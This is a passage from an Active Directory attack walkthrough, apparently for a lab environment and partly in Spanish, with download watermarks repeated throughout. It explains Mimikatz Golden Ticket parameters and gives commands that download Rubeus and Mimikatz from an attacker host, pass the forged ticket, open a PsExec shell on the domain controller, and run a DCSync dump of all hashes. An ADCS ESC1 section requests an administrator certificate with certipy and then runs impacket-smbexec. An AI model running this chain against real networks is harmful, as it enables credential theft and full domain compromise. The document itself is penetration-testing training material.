kerberos::golden: Indica que se está realizando un ataque de Golden Ticket utilizando la
funcionalidad de Kerberos en Mimikatz.
/user:robb.stark: Especifica el nombre de usuario para el cual se va a generar el ticket Kerberos. En
este caso, se está generando un ticket para el usuario "robb.stark".
/domain:north.sevenkingdoms.local: Especifica el dominio para el cual se va a generar el ticket
Kerberos. Aquí, se indica el dominio "north.sevenkingdoms.local".
/sid:S-1-5-21-2332039752-785340267-2377082902: Proporciona el identificador de seguridad
(SID) del dominio. Cada dominio tiene un SID único y esta información se utiliza en la generación
del ticket Kerberos.
/sids:S-1-5-21-656936499-3686200758-3068599609-519: Especifica los SIDs adicionales que se
van a incluir en el ticket Kerberos. Estos SIDs pueden representar grupos de seguridad u otros
elementos dentro del dominio.
/krbtgt:3f669715abb8fb5cada5f208d458e218: Proporciona el hash del KRBTGT del dominio. El
KRBTGT es una cuenta de servicio especial en Active Directory que se utiliza para cifrar y firmar
todos los tickets Kerberos en el dominio. El hash KRBTGT es crucial para generar un ticket
Kerberos válido.
/ticket:ticket.kirbi: Especifica la ruta donde se guardará el ticket Kerberos generado. En este caso,
el ticket se guardará en un archivo llamado "ticket.kirbi".

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

iwr http://192.168.100.150/Ghostpack-CompiledBinaries/dotnet%20v4.5%20compiled
%20binaries/Rubeus.exe -O Rubeus.exe
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist
dir \\KINGSLANDING.sevenkingdoms.local\C$

.\PsExec64.exe -accepteula \\KINGSLANDING.sevenkingdoms.local powershell.exe

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

cd c:\tmp
iwr http://192.168.100.150/mimi64.exe -O mimi64.exe
token::elevate
privilege::debug

lsadump::dcsync /domain:north.sevenkingdoms.local /all /csv

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

ADCS (ACTIVE DIRECTORY CERTIFICATE SERVICES)

Refers to weaknesses in the Active Directory certificate service that could be exploited by attackers
to compromise the security of the infrastructure, possibly allowing fraudulent issuance of
certificates or identity theft.

We extract the information from the domain certificates, to import it into bloodhound (an older
version)

pip3 install certipy-ad

certipy-ad find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12

wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-
x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound4.2-ly4k
BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage
We import the .zip file (in an automated way the queries will be installed)

certipy-ad req -u khal.drogo@essos.local -p 'horse' -target braavos.essos.local -template ESC1 -ca

ESSOS-CA -upn administrator@essos.local
certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12
export KRB5CCNAME=administrator.ccache
impacket-smbexec -k @braavos.essos.local -dc-ip 192.168.56.12

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

! Thanks you very much !

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)